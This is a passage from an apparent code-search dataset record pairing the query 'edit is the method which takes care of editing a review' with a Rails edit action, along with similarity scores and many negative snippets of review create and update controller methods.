"def create\n @review = Review.new(review_params)\n\n if Course.exists?(params[:review][:course_id]) and Professor.exists?(params[:review][:professor_id])\n course = Course.find(params[:review][:course_id])\n professor = Professor.find(params[:review][:professor_id])\n if !professor.courses.exists?(course.id)\n professor.courses << course\n professor.save\n end\n reviews = Review.where(course_id: params[:review][:course_id], professor_id: params[:review][:professor_id])\n average = (reviews.sum(:rating) + @review.rating)/(reviews.count.to_f + 1)\n course_professor_association = CourseProfessorAssociation.find_by(course_id: params[:review][:course_id], professor_id: params[:review][:professor_id])\n course_professor_association.average_rating = average\n course_professor_association.save\n end\n respond_to do |format|\n if @review.save\n format.html { redirect_to show_reviews_path(professor_id: params[:review][:professor_id], course_id: params[:review][:course_id]),\n notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n @professors = Professor.all\n @courses = Course.all\n @course_id = params[:review][:course_id]\n @professor_id = params[:review][:professor_id]\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def new\n @review = Review.new\n end",
"def create\n @review = Review.new(review_params)\n if(@review.save)\n redirect_to game_path(@review.game)\n else\n @games = Game.all-current_user.games\n render :new\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = @user.id\n\n if @review.save\n flash[:success] = 'Review was successfully created.'\n redirect_to user_path(@user)\n else\n flash[:danger] = \"Try again\"\n render :new\n end\n end",
"def create\n @review = Review.new(review_params)\n @review.user_id = current_user.id\n @review.post_date = Time.now\n\n if @review.save\n # Create notifications for the user's friends\n current_user.friends.each do |friend|\n Notification.create(recipient: friend, actor: current_user, action: 'posted', notifiable: @review)\n end\n\n # Create and attach the tags\n create_tags collect_tags(params[:review]), @review.id\n redirect_to '/profile'\n else\n redirect_to '/home'\n end\n end",
"def create\n @user_review = UserReview.new(user_review_params)\n\n respond_to do |format|\n if @user_review.save!\n format.html { redirect_to user_reviews_path, notice: 'User review was successfully created.' }\n format.json { render :show, status: :created, location: @user_review }\n else\n format.html { render :new }\n format.json { render json: @user_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @critic_review = CriticReview.new(critic_review_params)\n\n respond_to do |format|\n if @critic_review.save\n format.html { redirect_to @critic_review, notice: 'Critic review was successfully created.' }\n format.json { render :show, status: :created, location: @critic_review }\n else\n format.html { render :new }\n format.json { render json: @critic_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item_review = ItemReview.new(item_review_params)\n\n respond_to do |format|\n if @item_review.save\n format.html { redirect_to @item_review, notice: 'Item review was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item_review }\n else\n format.html { render action: 'new' }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add_review(restaurant, content)\n Review.new(restaurant, self, content)\n end",
"def create\n @review = Review.new(review_params)\n @review.assign_attributes user: current_user, book_id: params[:book_id]\n if @review.save\n redirect_to book_path(@review.book)\n else\n render :new\n end\n end",
"def create\n @comic = Comic.find(params[:comic_id])\n @review = current_user.reviews.new(review_params)\n @review.tag_list = params[:tag_list]\n @review.comic_id = @comic.id\n p @review\n p review_params\n respond_to do |format|\n if @review.save\n format.html { redirect_to comic_path(@comic), notice: 'Review was successfully created.' }\n format.json { render :show, status: :created, location: @review }\n else\n format.html { render :new }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end"
] |
[
"0.7899681",
"0.78670037",
"0.77011317",
"0.766486",
"0.7655177",
"0.7631226",
"0.762612",
"0.76167107",
"0.75981355",
"0.758156",
"0.75776124",
"0.7572586",
"0.7566595",
"0.75486314",
"0.75380796",
"0.7514578",
"0.74950445",
"0.7490343",
"0.7468508",
"0.7468508",
"0.7467554",
"0.74673194",
"0.7420729",
"0.7414288",
"0.7396201",
"0.73846793",
"0.73767644",
"0.7374546",
"0.73714954",
"0.73714954",
"0.73714954",
"0.7364483",
"0.7358371",
"0.73567396",
"0.73541635",
"0.7330742",
"0.73259896",
"0.7319033",
"0.7302522",
"0.7294481",
"0.7276302",
"0.72752744",
"0.72738814",
"0.7272741",
"0.7266918",
"0.72619504",
"0.72601694",
"0.72513396",
"0.72483516",
"0.7247397",
"0.7247265",
"0.72461975",
"0.7244283",
"0.722575",
"0.722558",
"0.72242653",
"0.71955985",
"0.71940607",
"0.71907175",
"0.71856636",
"0.7183391",
"0.7180842",
"0.7154671",
"0.7149676",
"0.713895",
"0.71340704",
"0.7133696",
"0.7132234",
"0.71321493",
"0.7128558",
"0.7100638",
"0.7100087",
"0.70971227",
"0.70859027",
"0.70768386",
"0.705129",
"0.70344996",
"0.7025427",
"0.70168227",
"0.7016468",
"0.70149845",
"0.7000467",
"0.699917",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.69984764",
"0.6995317",
"0.6989556",
"0.6976831",
"0.696247",
"0.69618803",
"0.6958082",
"0.69554645",
"0.6952455",
"0.6939582"
] |
0.7508563
|
16
|
edit is the method which takes care of editing a review
|
def edit
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = Review.find(params[:id])
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def edit_review\n # client should be able to edit a review.\n puts \"Which review would you like to edit?\"\n pp Client.find_by(name: @@client_name).reviews\n puts \"Please enter the ID\"\n input = gets.strip\n selected_review = Review.find_by(id: input)\n puts \"What would you like for the new review to say?\"\n input = gets.strip\n selected_review.update(text_body: input)\n puts \"Your review has been updated, here's the new review:\"\n pp selected_review\n client_continue\n end",
"def edit\n \n end",
"def edit\n @title = t 'conclusion_draft_review.edit_title'\n\n @conclusion_draft_review.review.build_best_practice_comments\n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit\n \n end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def edit; end",
"def update\n\t\t@reviews = @share.reviews.order(priority: :asc)\n\t\t@reviewToAlter = Review.find(params[:id])\n\t\t@review = Review.find(params[:id])\n\t\tif @review.update(review_params)\n\t\t\tredirect_to share_reviews_path(@share), notice: 'Review successfully updated!'\n\t\telse\n\t\t\tflash[:alert] = \"Error : #{@review.errors.full_messages.to_sentence}\"\n\t\t\trender :edit\n\t\tend\n\tend",
"def edit\r\n \r\n end",
"def edit\n\n end",
"def edit\r\n end",
"def editReview\n # TODO: Do a server-side validation of all params in addition to client side (html) validation\n # Also sanitize input -- escape any javascript and html\n # TODO: Add validations/constrictions to DB\n @building = params[:building]\n @room = params[:room]\n @facilityType = params[:facility]\n @review = params[:review]\n @rating = params[:rating]\n\n @newReview = Review.find_by_id(params[:id])\n\n @newReview.review = @review\n @newReview.rating = @rating\n @newReview.save\n\n roomId = Room.where(roomNum: @room).first.id\n # Get the number of reviews for this room so we can calculate the new average\n reviews = Review.where(room_id: roomId).to_a\n nReviews = reviews.length\n reviewSum = reviews.reduce(0) { |sum, review| sum + review.rating}\n\n # Update rating average for room\n currentRoom = Room.find(roomId)\n currentRoom.save\n\n # Redirect user to results page\n redirect_to controller: 'room_page', action: 'roomInfo', id: roomId\n end",
"def update\n if @review.update_attributes(review_params)\n redirect_to edit_review_path(@review), notice: (\"Review was successfully updated.\")\n else\n render action: \"edit\"\n end\n end",
"def edit \n end",
"def edit \n end",
"def review\n end",
"def update\n if @review.update(review_params)\n redirect_to @review.story, notice: 'Review was successfully updated.'\n else\n render :edit\n end\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n\n end",
"def edit\n movie = Movie.find(params[:movie_id])\n @review = Review.find(params[:id])\n @movie = Movie.find(params[:movie_id])\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end",
"def edit\n end"
] |
[
"0.77618456",
"0.768884",
"0.76548994",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.7574851",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.756434",
"0.74978226",
"0.7478179",
"0.7455232",
"0.7444681",
"0.74160975",
"0.73966503",
"0.7389753",
"0.7389753",
"0.7383019",
"0.7364716",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.73611975",
"0.72983605",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7268397",
"0.7249033",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505",
"0.7247505"
] |
0.81355745
|
0
|
update routine updates a modified review. If the review is successfully modified, User will be notified using flash
|
def update
@reviews = @share.reviews.order(priority: :asc)
@reviewToAlter = Review.find(params[:id])
@review = Review.find(params[:id])
if @review.update(review_params)
redirect_to share_reviews_path(@share), notice: 'Review successfully updated!'
else
flash[:alert] = "Error : #{@review.errors.full_messages.to_sentence}"
render :edit
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def update\n\t\t\t\trender_invalid_action(current_review) unless current_review.update(update_driver_review_params)\n\t\t\tend",
"def update\n @review = Review.find(params[:id])\n\n if @review.update_attributes(params[:review])\n\t\t\tredirect_to reviews_path, :notice => \"De waardering is aangepast.\"\n else\n\t\t\tredirect_to reviews_path, :notice => \"De aanpassing kan op dit moment niet worden doorgevoerd. Het is mogelijk dat je meer dan drie referenties wilt aanvinken voor op de voorpagina.\"\n end\n end",
"def update\n respond_to do |format|\n if @review.update_attributes(review_params)\n flash[:success] = \"Review updated\"\n format.html { redirect_to @review.user } # notice: 'Review was successfully updated.'\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n @review.attributes = review_params(params)\n\n update_story_attributes(@review, params[:story])\n update_member_settings(@review, params[:review_form_expanded])\n update_source_review(@review.story, params[:source_ratings])\n \n if @review.save_and_process_with_propagation\n if current_member.status == 'guest'\n flash[:notice] = render_to_string(:inline => \"<h2>Your review was successfully updated,<br>but will not be published until you activate your account.</h2>Check your email inbox and click on your activation link. For help, check our <%= help_link('FAQ', 'activate') %>.\")\n render :json => { :go => :story_actions, \n :form_transition => {:from => :review, :to => :story_actions} }.to_json\n else\n notice = tweet_if_requested(@review, params[:short_url])\n render :json => { :go => :story_actions, \n :form_transition => {:from => :review, :to => :story_actions}, \n :notice => notice,\n :fb_stream_story => toolbar_facebook_stream_story(@review) }.to_json\n end\n\n if @review.hidden? && !current_member.has_role_or_above?(:admin)\n NotificationMailer.deliver_edit_alert(:subject => \"Hidden Review Updated\", :body => \"Check #{review_url(@review)}.\")\n end\n else\n render :json => {:error_message => \"Failed to save review\"}.to_json\n end\n end",
"def update\n if @review.update(review_params)\n flash[:success] = 'Review was successfully updated.'\n redirect_to user_path(@user)\n else\n flash[:danger] = \"Try again\"\n render :new\n end\n end",
"def update\n respond_to do |format|\n #If the params are filled in and valid, it redirects to the review page and shows the notice\n if @review.update(review_params)\n format.html { redirect_to @review, notice: t('review.update') }\n format.json { render :show, status: :ok, location: @review }\n #If it doesnt update then it refreshes the edit review page\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update_attributes(review_params)\n redirect_to edit_review_path(@review), notice: (\"Review was successfully updated.\")\n else\n render action: \"edit\"\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @user, notice: '评价更新成功' }\n format.json { head :no_content }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = reviewable.reviews.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to reviewable_review_url(reviewable, @review), notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\t handle_faculty\n\t\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = 'Review was successfully updated.'\n format.html { redirect_to(@review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = 'Review was successfully updated.'\n format.html { redirect_to(@review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n render :show, status: :ok, location: @review\n else\n render json: @review.errors, status: :unprocessable_entity\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review.publication, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: \"振り返りの更新に成功しました。\" }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: \"レビューを更新しました\" }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit, status: :unprocessable_entity }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if current_user.blank?\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'You must be\n logged in to update a review.'\n else\n @review.authuser_id = current_user.id\n respond_to do |format|\n if @review.update(review_params)\n format.html do\n redirect_to professor_course_path(\n @review.professor_id,\n @review.course_id\n ),\n notice: 'Review was successfully updated.'\n end\n format.json { render :show, status: :ok, location: @review }\n else\n format.html do\n @courses = load_courses\n @professors = load_professors\n render :edit\n end\n format.json do\n render json: @review.errors, status: :unprocessable_entity\n end\n end\n end\n end\n end",
"def update\n respond_to do |format|\n if @critic_review.update(critic_review_params)\n format.html { redirect_to @critic_review, notice: 'Critic review was successfully updated.' }\n format.json { render :show, status: :ok, location: @critic_review }\n else\n format.html { render :edit }\n format.json { render json: @critic_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n @paper = @review.paper\n @rate = 0.0\n @top = 0.0\n @bottem = 0.0\n @paper.reviews.each do |review| \n @top += review.score * review.confidence\n @bottem += review.confidence\n end\n @rate = @top / @bottem\n @paper.update_attribute(:rating, @paper.rating = @rate)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to project_path(@project), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to restaurent_path(@restaurent.id), notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n unless current_user.is_review_moderator? or current_user = @review.user\n redirect_to denied_path\n return\n end\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @admin_review.update(admin_review_params)\n format.html { redirect_to admin_review_path(@admin_review), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: admin_review_path(@admin_review) }\n else\n format.html { render :edit }\n format.json { render json: @admin_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @listing, notice: 'Review was updated.' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @user_review.update!(user_review_params)\n format.html { redirect_to user_reviews_path, notice: 'User review was successfully updated.' }\n format.json { render :show, status: :ok, location: @user_review }\n else\n format.html { render :edit }\n format.json { render json: @user_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@review = Review.find(params[:id])\n\t\t@review.establishment = Establishment.find(params[:establishment])\n\t\t@review.category = Category.find(params[:category])\n\t\t@review.clientele = Clientele.find(params[:clientele])\n\t\t@review.sound_level = SoundLevel.find(params[:sound_level])\n\t\t@review.hygiene = Hygiene.find(params[:hygiene])\n\t\t@review.rating = Rating.find(params[:rating])\n\n\t\trespond_to do |format|\n\t\t\tif @review.update_attributes(params[:review])\n\t\t\t\tformat.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n\t\t\t\tformat.xml { head :ok }\n\t\t\telse\n\t\t\t\tformat.html { render :action => \"edit\" }\n\t\t\t\tformat.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n\t\t\tend\n\t\tend\n\tend",
"def update\n @review = Review.find(params[:id])\n # respond_to do |format|\n \n if @review.update(review_params)\n flash[:success] = '店舗情報を修正しました。'\n redirect_to reviews_path(@review)\n else\n render 'edit'\n end\n end",
"def update\n @user_review = UserReview.find(params[:id])\n\n respond_to do |format|\n if @user_review.update_attributes(params[:user_review])\n flash[:notice] = 'UserReview was successfully updated.'\n format.html { redirect_to(@user_review) }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @user_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n @review = @album.review\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n flash[:notice] = \"Review '#{@review}' was successfully updated.\"\n format.html { redirect_to review_url(@review) }\n format.xml { head :ok }\n format.js { render :template => 'music/reviews/success' }\n else\n format.html { render :action => :edit }\n format.xml { render :xml => @review.errors.to_xml }\n format.js { render :template => 'music/reviews/error' }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to categories_url, notice: 'レビューの更新完了です!' }\n format.json { render :show, status: :ok, location: @review }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update_review\n @review = Review.find(params[:id])\n @review.update(params[:review])\n redirect \"/reviews/#{@review.id}\"\n end",
"def update\n @review = Review.find(params[:id])\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { head :no_content }\n format.js {render nothing: true}\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review.lecture, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review.lecture }\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n @review = Review.find(params[:id])\n @submission = ReviewSubmission.new(:review_id => @review.id, :submission_date => Time.now)\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n if @submission.save\n SubmissionNotifier.deliver_resubmission_notification(@submission)\n format.html { redirect_to(@review, :notice => 'Review and Submission were successfully created.') }\n else\n format.html { redirect_to(@review, :notice => 'Review was successfully created but the submission was not.') }\n end\n format.html { redirect_to(@review, :notice => 'Review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update_reviews\n review_notes = self.reviews.map do |review|\n {review.notes => review.id}\n end\n if review_notes.length == 0\n @@prompt.select(\"No reviews to update\".colorize(:yellow)) do |menu|\n menu.choice \"Back\", -> { self.main_menu }\n end\n else\n review_id = @@prompt.select(\"Select review to update\", review_notes)\n review = Review.find(review_id)\n \n new_rev = @@prompt.ask(\"Please type your new note: \")\n review.notes = new_rev\n review.save\n review.reload\n end\n\n self.reload\n\n puts \"------------------------\"\n @@prompt.select(\"\") do |menu|\n menu.choice \"Back\", -> {self.main_menu}\n end\n end",
"def update\n\n respond_to do |format|\n if @review.update_attributes(params[:review])\n format.html { redirect_to vendor_path(@review.vendor, view: \"recomendacoes\"), notice: 'A sua avaliação foi atualizada com sucesso' }\n format.json { head :ok }\n else\n format.html { render action: \"edit\" }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n if @review.update(review_params)\n redirect_to @review.story, notice: 'Review was successfully updated.'\n else\n render :edit\n end\n end",
"def update\n\t\treview = Review.find(params['id'].to_i) if params['id']\n\t\treview.review_text = params['review_text'] if params['review_text']\n\t\treview.rating = params['rating'] if params['rating']\n\t\treview.reviewer_id = params['reviewer_id'] if params['reviewer_id']\n\t\treview.user_id = params['user_id'].to_i if params['user_id']\n\t\treview.trip_id = params['trip_id'].to_i if params['trip_id']\n\t\treview.save\n\tend",
"def update\n @professor_review = ProfessorReview.find(params[:id])\n\n respond_to do |format|\n if @professor_review.update_attributes(params[:professor_review])\n format.html { redirect_to(@professor_review, :notice => 'Professor review was successfully updated.') }\n format.xml { head :ok }\n else\n format.html { render :action => \"edit\" }\n format.xml { render :xml => @professor_review.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def update\n #find the individual review\n @review = Review.find(params[:id])\n\n #check to see if you're the poster\n if @review.user != @current_user\n #take it back to homepage\n redirect_to root_path\n else\n #update the new info from the form - update with new info from the form\n if @review.update(form_params)\n #redirect to individual show page\n redirect_to review_path(@review)\n else\n # using this it will render any validation to the main edit page\n render \"edit\"\n end\n end\n end",
"def update\n respond_to do |format|\n if @item_review.update(item_review_params)\n format.html { redirect_to @item_review, notice: 'Item review was successfully updated.' }\n format.json { head :no_content }\n else\n format.html { render action: 'edit' }\n format.json { render json: @item_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n respond_to do |format|\n if @review.update(review_params)\n # Broadcast updated review on list from model.\n format.turbo_stream\n format.html { redirect_to recipe_path(@recipe, anchor: \"review_#{@review.id}\"), notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @recipe }\n else\n format.turbo_stream do\n # Display errors.\n render turbo_stream: turbo_stream.replace(\"review_form_review_#{@review.id}\",\n partial: \"reviews/form\", locals: { recipe: @recipe, review: @review })\n end\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t\t@review = Review.find(params[:id])\n\n\t\tif @review.update(review_params.merge(:contract_id => @review.contract_id))\n\t\t\tredirect_to @review\n\t\telse\n\t\t\trender 'edit'\n\t\t\t# => Error when updating empty body element.\n\t\tend\n\tend",
"def update\n respond_to do |format|\n if @hm_review.update(hm_review_params)\n format.html { redirect_to @hm_review, notice: 'Hm review was successfully updated.' }\n format.json { render :show, status: :ok, location: @hm_review }\n else\n format.html { render :edit }\n format.json { render json: @hm_review.errors, status: :unprocessable_entity }\n end\n end\n end",
"def update\n\t@review.user_id = current_user.id\n\n respond_to do |format|\n if @review.update(review_params)\n format.html { redirect_to @review, notice: 'Review was successfully updated.' }\n format.json { render :show, status: :ok, location: @review }\n\t\tformat.js\n else\n format.html { render :edit }\n format.json { render json: @review.errors, status: :unprocessable_entity }\n\t\tformat.js { render 'shared/errors' }\n end\n end\n end",
